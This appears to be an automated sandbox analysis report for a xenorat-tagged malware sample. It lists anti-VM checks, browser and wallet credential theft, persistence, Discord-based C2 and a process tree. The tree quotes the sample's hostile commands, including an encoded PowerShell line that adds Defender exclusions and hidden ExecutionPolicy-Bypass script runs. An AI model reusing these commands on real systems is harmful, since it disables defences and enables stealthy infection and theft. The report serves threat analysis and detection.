xenorat | 363108d651fdaa2b799b73018a910f9c55fbbb7025761eabb37a673d5650542d

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	363108d651fdaa2b799b73018a910f9c55fbbb7025761eabb37a673d5650542d.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Usermode Disk Driver Host.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Runtime Broker.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
26	244	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3244	powershell.exe
2400	powershell.exe
2840	powershell.exe
3660	powershell.exe
244	powershell.exe
3616	powershell.exe

Downloads MZ/PE file

Checks BIOS information in registry 2 TTPs 6 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	363108d651fdaa2b799b73018a910f9c55fbbb7025761eabb37a673d5650542d.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Usermode Disk Driver Host.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Usermode Disk Driver Host.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Runtime Broker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Runtime Broker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	363108d651fdaa2b799b73018a910f9c55fbbb7025761eabb37a673d5650542d.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	363108d651fdaa2b799b73018a910f9c55fbbb7025761eabb37a673d5650542d.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	obfs.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	tmpeerlr8ao.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
2344	cmd.exe
4600	powershell.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Update Script.pyw	obfs.exe

Executes dropped EXE 7 IoCs

pid	Process
2412	Minecraft Checker.exe
2560	Runtime Broker.exe
5024	Usermode Disk Driver Host.exe
4068	obfs.exe
4452	tmpeerlr8ao.exe
1736	tmpeerlr8ao.exe
4720	python-3.11.0-amd64.exe

Loads dropped DLL 49 IoCs

pid	Process
4068	obfs.exe
4068	obfs.exe
4068	obfs.exe
4068	obfs.exe
4068	obfs.exe
4068	obfs.exe
4068	obfs.exe
4068	obfs.exe
4068	obfs.exe
4068	obfs.exe
4068	obfs.exe
4068	obfs.exe
4068	obfs.exe
4068	obfs.exe
4068	obfs.exe
4068	obfs.exe
4068	obfs.exe
4068	obfs.exe
4068	obfs.exe
4068	obfs.exe
4068	obfs.exe
4068	obfs.exe
4068	obfs.exe
4068	obfs.exe
4068	obfs.exe
4068	obfs.exe
4068	obfs.exe
4068	obfs.exe
4068	obfs.exe
4068	obfs.exe
4068	obfs.exe
4068	obfs.exe
4068	obfs.exe
4068	obfs.exe
4068	obfs.exe
4068	obfs.exe
4068	obfs.exe
4068	obfs.exe
4068	obfs.exe
4068	obfs.exe
4068	obfs.exe
4068	obfs.exe
4068	obfs.exe
4068	obfs.exe
4068	obfs.exe
4068	obfs.exe
4068	obfs.exe
4068	obfs.exe
1736	tmpeerlr8ao.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Themida packer 16 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral2/memory/3616-0-0x0000000000400000-0x0000000002758000-memory.dmp	themida
behavioral2/memory/3616-2-0x0000000000400000-0x0000000002758000-memory.dmp	themida
behavioral2/memory/3616-3-0x0000000000400000-0x0000000002758000-memory.dmp	themida
behavioral2/files/0x000a000000023ba8-21.dat	themida
behavioral2/files/0x000a000000023baa-32.dat	themida
behavioral2/memory/3616-30-0x0000000000400000-0x0000000002758000-memory.dmp	themida
behavioral2/memory/3616-44-0x0000000000400000-0x0000000002758000-memory.dmp	themida
behavioral2/memory/5024-64-0x0000000000A70000-0x0000000001628000-memory.dmp	themida
behavioral2/memory/5024-65-0x0000000000A70000-0x0000000001628000-memory.dmp	themida
behavioral2/memory/2560-88-0x00007FF7C4D50000-0x00007FF7C6824000-memory.dmp	themida
behavioral2/memory/2560-89-0x00007FF7C4D50000-0x00007FF7C6824000-memory.dmp	themida
behavioral2/memory/2560-90-0x00007FF7C4D50000-0x00007FF7C6824000-memory.dmp	themida
behavioral2/memory/2560-93-0x00007FF7C4D50000-0x00007FF7C6824000-memory.dmp	themida
behavioral2/memory/2560-207-0x00007FF7C4D50000-0x00007FF7C6824000-memory.dmp	themida
behavioral2/memory/2560-251-0x00007FF7C4D50000-0x00007FF7C6824000-memory.dmp	themida
behavioral2/memory/2560-480-0x00007FF7C4D50000-0x00007FF7C6824000-memory.dmp	themida

Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 3 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	363108d651fdaa2b799b73018a910f9c55fbbb7025761eabb37a673d5650542d.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Usermode Disk Driver Host.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Runtime Broker.exe

Hide Artifacts: Hidden Window 1 TTPs 1 IoCs

Windows that would typically be displayed when an application carries out an operation can be hidden.

defense_evasion

Hidden Window

T1564.003

pid	Process
2424	cmd.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
50	discord.com
51	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
44	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

pid	Process
3616	363108d651fdaa2b799b73018a910f9c55fbbb7025761eabb37a673d5650542d.exe
5024	Usermode Disk Driver Host.exe
2560	Runtime Broker.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
4552	2412	WerFault.exe	87

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	363108d651fdaa2b799b73018a910f9c55fbbb7025761eabb37a673d5650542d.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Minecraft Checker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Usermode Disk Driver Host.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tmpeerlr8ao.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tmpeerlr8ao.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	python-3.11.0-amd64.exe

Checks SCSI registry key(s) 3 TTPs 5 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 00000000040000009fc5eef0dbaffe7c0000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff0000000027010100000800009fc5eef00000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff0000000007000100006809009fc5eef0000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d9fc5eef0000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000009fc5eef000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	obfs.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	obfs.exe

Detects videocard installed 1 TTPs 2 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

pid	Process
512	WMIC.exe
1332	WMIC.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
3676	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2404	powershell.exe
2404	powershell.exe
5024	Usermode Disk Driver Host.exe
5024	Usermode Disk Driver Host.exe
5024	Usermode Disk Driver Host.exe
244	powershell.exe
244	powershell.exe
5024	Usermode Disk Driver Host.exe
5024	Usermode Disk Driver Host.exe
5024	Usermode Disk Driver Host.exe
5024	Usermode Disk Driver Host.exe
5024	Usermode Disk Driver Host.exe
5024	Usermode Disk Driver Host.exe
5024	Usermode Disk Driver Host.exe
5024	Usermode Disk Driver Host.exe
5024	Usermode Disk Driver Host.exe
5024	Usermode Disk Driver Host.exe
5024	Usermode Disk Driver Host.exe
5024	Usermode Disk Driver Host.exe
5024	Usermode Disk Driver Host.exe
5024	Usermode Disk Driver Host.exe
5024	Usermode Disk Driver Host.exe
5024	Usermode Disk Driver Host.exe
5024	Usermode Disk Driver Host.exe
5024	Usermode Disk Driver Host.exe
5024	Usermode Disk Driver Host.exe
5024	Usermode Disk Driver Host.exe
5024	Usermode Disk Driver Host.exe
5024	Usermode Disk Driver Host.exe
5024	Usermode Disk Driver Host.exe
5024	Usermode Disk Driver Host.exe
5024	Usermode Disk Driver Host.exe
5024	Usermode Disk Driver Host.exe
5024	Usermode Disk Driver Host.exe
5024	Usermode Disk Driver Host.exe
5024	Usermode Disk Driver Host.exe
5024	Usermode Disk Driver Host.exe
5024	Usermode Disk Driver Host.exe
5024	Usermode Disk Driver Host.exe
5024	Usermode Disk Driver Host.exe
5024	Usermode Disk Driver Host.exe
5024	Usermode Disk Driver Host.exe
5024	Usermode Disk Driver Host.exe
5024	Usermode Disk Driver Host.exe
5024	Usermode Disk Driver Host.exe
5024	Usermode Disk Driver Host.exe
5024	Usermode Disk Driver Host.exe
5024	Usermode Disk Driver Host.exe
5024	Usermode Disk Driver Host.exe
5024	Usermode Disk Driver Host.exe
5024	Usermode Disk Driver Host.exe
5024	Usermode Disk Driver Host.exe
5024	Usermode Disk Driver Host.exe
5024	Usermode Disk Driver Host.exe
5024	Usermode Disk Driver Host.exe
5024	Usermode Disk Driver Host.exe
5024	Usermode Disk Driver Host.exe
5024	Usermode Disk Driver Host.exe
5024	Usermode Disk Driver Host.exe
5024	Usermode Disk Driver Host.exe
5024	Usermode Disk Driver Host.exe
5024	Usermode Disk Driver Host.exe
5024	Usermode Disk Driver Host.exe
5024	Usermode Disk Driver Host.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2404	powershell.exe
Token: SeDebugPrivilege	4068	obfs.exe
Token: SeDebugPrivilege	5024	Usermode Disk Driver Host.exe
Token: SeDebugPrivilege	244	powershell.exe
Token: SeIncreaseQuotaPrivilege	2212	WMIC.exe
Token: SeSecurityPrivilege	2212	WMIC.exe
Token: SeTakeOwnershipPrivilege	2212	WMIC.exe
Token: SeLoadDriverPrivilege	2212	WMIC.exe
Token: SeSystemProfilePrivilege	2212	WMIC.exe
Token: SeSystemtimePrivilege	2212	WMIC.exe
Token: SeProfSingleProcessPrivilege	2212	WMIC.exe
Token: SeIncBasePriorityPrivilege	2212	WMIC.exe
Token: SeCreatePagefilePrivilege	2212	WMIC.exe
Token: SeBackupPrivilege	2212	WMIC.exe
Token: SeRestorePrivilege	2212	WMIC.exe
Token: SeShutdownPrivilege	2212	WMIC.exe
Token: SeDebugPrivilege	2212	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2212	WMIC.exe
Token: SeRemoteShutdownPrivilege	2212	WMIC.exe
Token: SeUndockPrivilege	2212	WMIC.exe
Token: SeManageVolumePrivilege	2212	WMIC.exe
Token: 33	2212	WMIC.exe
Token: 34	2212	WMIC.exe
Token: 35	2212	WMIC.exe
Token: 36	2212	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2212	WMIC.exe
Token: SeSecurityPrivilege	2212	WMIC.exe
Token: SeTakeOwnershipPrivilege	2212	WMIC.exe
Token: SeLoadDriverPrivilege	2212	WMIC.exe
Token: SeSystemProfilePrivilege	2212	WMIC.exe
Token: SeSystemtimePrivilege	2212	WMIC.exe
Token: SeProfSingleProcessPrivilege	2212	WMIC.exe
Token: SeIncBasePriorityPrivilege	2212	WMIC.exe
Token: SeCreatePagefilePrivilege	2212	WMIC.exe
Token: SeBackupPrivilege	2212	WMIC.exe
Token: SeRestorePrivilege	2212	WMIC.exe
Token: SeShutdownPrivilege	2212	WMIC.exe
Token: SeDebugPrivilege	2212	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2212	WMIC.exe
Token: SeRemoteShutdownPrivilege	2212	WMIC.exe
Token: SeUndockPrivilege	2212	WMIC.exe
Token: SeManageVolumePrivilege	2212	WMIC.exe
Token: 33	2212	WMIC.exe
Token: 34	2212	WMIC.exe
Token: 35	2212	WMIC.exe
Token: 36	2212	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1332	WMIC.exe
Token: SeSecurityPrivilege	1332	WMIC.exe
Token: SeTakeOwnershipPrivilege	1332	WMIC.exe
Token: SeLoadDriverPrivilege	1332	WMIC.exe
Token: SeSystemProfilePrivilege	1332	WMIC.exe
Token: SeSystemtimePrivilege	1332	WMIC.exe
Token: SeProfSingleProcessPrivilege	1332	WMIC.exe
Token: SeIncBasePriorityPrivilege	1332	WMIC.exe
Token: SeCreatePagefilePrivilege	1332	WMIC.exe
Token: SeBackupPrivilege	1332	WMIC.exe
Token: SeRestorePrivilege	1332	WMIC.exe
Token: SeShutdownPrivilege	1332	WMIC.exe
Token: SeDebugPrivilege	1332	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1332	WMIC.exe
Token: SeRemoteShutdownPrivilege	1332	WMIC.exe
Token: SeUndockPrivilege	1332	WMIC.exe
Token: SeManageVolumePrivilege	1332	WMIC.exe
Token: 33	1332	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3616 wrote to memory of 2404	3616	363108d651fdaa2b799b73018a910f9c55fbbb7025761eabb37a673d5650542d.exe	84
PID 3616 wrote to memory of 2404	3616	363108d651fdaa2b799b73018a910f9c55fbbb7025761eabb37a673d5650542d.exe	84
PID 3616 wrote to memory of 2404	3616	363108d651fdaa2b799b73018a910f9c55fbbb7025761eabb37a673d5650542d.exe	84
PID 3616 wrote to memory of 2412	3616	363108d651fdaa2b799b73018a910f9c55fbbb7025761eabb37a673d5650542d.exe	87
PID 3616 wrote to memory of 2412	3616	363108d651fdaa2b799b73018a910f9c55fbbb7025761eabb37a673d5650542d.exe	87
PID 3616 wrote to memory of 2412	3616	363108d651fdaa2b799b73018a910f9c55fbbb7025761eabb37a673d5650542d.exe	87
PID 3616 wrote to memory of 2560	3616	363108d651fdaa2b799b73018a910f9c55fbbb7025761eabb37a673d5650542d.exe	89
PID 3616 wrote to memory of 2560	3616	363108d651fdaa2b799b73018a910f9c55fbbb7025761eabb37a673d5650542d.exe	89
PID 3616 wrote to memory of 5024	3616	363108d651fdaa2b799b73018a910f9c55fbbb7025761eabb37a673d5650542d.exe	90
PID 3616 wrote to memory of 5024	3616	363108d651fdaa2b799b73018a910f9c55fbbb7025761eabb37a673d5650542d.exe	90
PID 3616 wrote to memory of 5024	3616	363108d651fdaa2b799b73018a910f9c55fbbb7025761eabb37a673d5650542d.exe	90
PID 5024 wrote to memory of 3676	5024	Usermode Disk Driver Host.exe	98
PID 5024 wrote to memory of 3676	5024	Usermode Disk Driver Host.exe	98
PID 5024 wrote to memory of 3676	5024	Usermode Disk Driver Host.exe	98
PID 2560 wrote to memory of 4068	2560	Runtime Broker.exe	100
PID 2560 wrote to memory of 4068	2560	Runtime Broker.exe	100
PID 4068 wrote to memory of 244	4068	obfs.exe	102
PID 4068 wrote to memory of 244	4068	obfs.exe	102
PID 4068 wrote to memory of 4452	4068	obfs.exe	105
PID 4068 wrote to memory of 4452	4068	obfs.exe	105
PID 4068 wrote to memory of 4452	4068	obfs.exe	105
PID 4452 wrote to memory of 1736	4452	tmpeerlr8ao.exe	106
PID 4452 wrote to memory of 1736	4452	tmpeerlr8ao.exe	106
PID 4452 wrote to memory of 1736	4452	tmpeerlr8ao.exe	106
PID 4068 wrote to memory of 3212	4068	obfs.exe	107
PID 4068 wrote to memory of 3212	4068	obfs.exe	107
PID 3212 wrote to memory of 2212	3212	cmd.exe	109
PID 3212 wrote to memory of 2212	3212	cmd.exe	109
PID 4068 wrote to memory of 4176	4068	obfs.exe	110
PID 4068 wrote to memory of 4176	4068	obfs.exe	110
PID 4176 wrote to memory of 1564	4176	cmd.exe	112
PID 4176 wrote to memory of 1564	4176	cmd.exe	112
PID 4068 wrote to memory of 3252	4068	obfs.exe	113
PID 4068 wrote to memory of 3252	4068	obfs.exe	113
PID 1736 wrote to memory of 4720	1736	tmpeerlr8ao.exe	115
PID 1736 wrote to memory of 4720	1736	tmpeerlr8ao.exe	115
PID 1736 wrote to memory of 4720	1736	tmpeerlr8ao.exe	115
PID 3252 wrote to memory of 744	3252	cmd.exe	116
PID 3252 wrote to memory of 744	3252	cmd.exe	116
PID 4068 wrote to memory of 1452	4068	obfs.exe	117
PID 4068 wrote to memory of 1452	4068	obfs.exe	117
PID 1452 wrote to memory of 1332	1452	cmd.exe	119
PID 1452 wrote to memory of 1332	1452	cmd.exe	119
PID 4068 wrote to memory of 1388	4068	obfs.exe	121
PID 4068 wrote to memory of 1388	4068	obfs.exe	121
PID 1388 wrote to memory of 512	1388	cmd.exe	124
PID 1388 wrote to memory of 512	1388	cmd.exe	124
PID 4068 wrote to memory of 2424	4068	obfs.exe	126
PID 4068 wrote to memory of 2424	4068	obfs.exe	126
PID 2424 wrote to memory of 3616	2424	cmd.exe	128
PID 2424 wrote to memory of 3616	2424	cmd.exe	128
PID 4068 wrote to memory of 1200	4068	obfs.exe	129
PID 4068 wrote to memory of 1200	4068	obfs.exe	129
PID 4068 wrote to memory of 2196	4068	obfs.exe	131
PID 4068 wrote to memory of 2196	4068	obfs.exe	131
PID 4068 wrote to memory of 1700	4068	obfs.exe	132
PID 4068 wrote to memory of 1700	4068	obfs.exe	132
PID 4068 wrote to memory of 4636	4068	obfs.exe	135
PID 4068 wrote to memory of 4636	4068	obfs.exe	135
PID 4068 wrote to memory of 2344	4068	obfs.exe	136
PID 4068 wrote to memory of 2344	4068	obfs.exe	136
PID 4636 wrote to memory of 3244	4636	cmd.exe	139
PID 4636 wrote to memory of 3244	4636	cmd.exe	139
PID 1700 wrote to memory of 3660	1700	cmd.exe	140

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\363108d651fdaa2b799b73018a910f9c55fbbb7025761eabb37a673d5650542d.exe
"C:\Users\Admin\AppData\Local\Temp\363108d651fdaa2b799b73018a910f9c55fbbb7025761eabb37a673d5650542d.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3616
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGMAcgBnACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZwBzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAagBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAZgBzACMAPgA="
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2404
- C:\Users\Admin\AppData\Local\Temp\Minecraft Checker.exe
  "C:\Users\Admin\AppData\Local\Temp\Minecraft Checker.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2412
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2412 -s 892
    3⤵
    - Program crash
    PID:4552
- C:\Users\Admin\AppData\Local\Temp\Runtime Broker.exe
  "C:\Users\Admin\AppData\Local\Temp\Runtime Broker.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of WriteProcessMemory
  PID:2560
- - C:\Users\Admin\AppData\Local\Temp\onefile_2560_133779521119452212\obfs.exe
    "C:\Users\Admin\AppData\Local\Temp\Runtime Broker.exe"
    3⤵
    - Checks computer location settings
    - Drops startup file
    - Executes dropped EXE
    - Loads dropped DLL
    - Checks processor information in registry
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4068
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command " $url = \"https://www.python.org/ftp/python/3.11.0/python-3.11.0-amd64.exe\" $filePath = \"C:\Users\Admin\AppData\Local\Temp\tmpeerlr8ao.exe\" Invoke-WebRequest -Uri $url -OutFile $filePath "
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:244
  - - C:\Users\Admin\AppData\Local\Temp\tmpeerlr8ao.exe
      "C:\Users\Admin\AppData\Local\Temp\tmpeerlr8ao.exe" /quiet InstallAllUsers=1 PrependPath=1 Include_test=0
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4452
    - - C:\Windows\Temp\{614E1BAB-3C8E-4B71-9C5F-A6E959B6B3C6}\.cr\tmpeerlr8ao.exe
        
        "C:\Windows\Temp\{614E1BAB-3C8E-4B71-9C5F-A6E959B6B3C6}\.cr\tmpeerlr8ao.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\tmpeerlr8ao.exe" -burn.filehandle.attached=704 -burn.filehandle.self=708 /quiet InstallAllUsers=1 PrependPath=1 Include_test=0
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1736
      - C:\Windows\Temp\{1E4D4196-AECF-4879-9BBA-845587645788}\.be\python-3.11.0-amd64.exe
        
        "C:\Windows\Temp\{1E4D4196-AECF-4879-9BBA-845587645788}\.be\python-3.11.0-amd64.exe" -q -burn.elevated BurnPipe.{7ECD59B9-6B04-42C3-982B-D2761035EDD5} {A566FD22-9F18-4055-9BEC-D03D6655F3B4} 1736
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4720
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3212
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2212
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4176
    - - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc
        5⤵
        
        PID:1564
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3252
    - - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName
        5⤵
        
        PID:744
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1452
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        Suspicious use of AdjustPrivilegeToken
        
        PID:1332
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1388
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:512
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\Users\Admin\AppData\Local\Temp\oNtScM.ps1"
      4⤵
      Hide Artifacts: Hidden Window
      Suspicious use of WriteProcessMemory
      PID:2424
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\Users\Admin\AppData\Local\Temp\oNtScM.ps1
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3616
  - - C:\Windows\system32\cmd.exe
